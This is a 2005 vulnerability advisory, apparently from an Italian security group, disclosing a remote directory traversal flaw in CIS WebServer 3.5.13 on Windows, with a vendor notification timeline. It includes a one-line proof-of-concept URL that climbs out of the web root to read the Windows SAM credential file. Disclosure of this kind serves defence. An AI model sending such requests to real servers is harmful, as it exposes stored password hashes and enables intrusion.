CIS WebServer Directory Traversal Bug
-=[ x0n3-h4ck Italian Security Team ]=-
/*Advisories*\
/*
Application: CIS WebServer
Vendor's Url: www.cisindia.net
Version: 3.5.13
Platforms: Windows
Bug: Directory Traversal
Exploitation: Remote
Author: CorryL
corryl80@xxxxxxxxx
www.x0n3-h4ck.org
*\
{Description}
CIS WebServer is an easy http server, A remote user can obtain files on the
system that are located outside of
the web document directory.
{Bug}
http://victimhost/../../../windows/repair/sam
A remote user succeds to read the file sam of the system where CIS WebServer
is running
{Vendor Status}
20/02/2005 Vendor notification
21/02/2005 Vendor Response
25/02/2005 No patch relase from vendor
25/02/2005 Public disclousure
{Fix}
Waiting for an official patch
_________________________________
www.seekstat.it is your web stat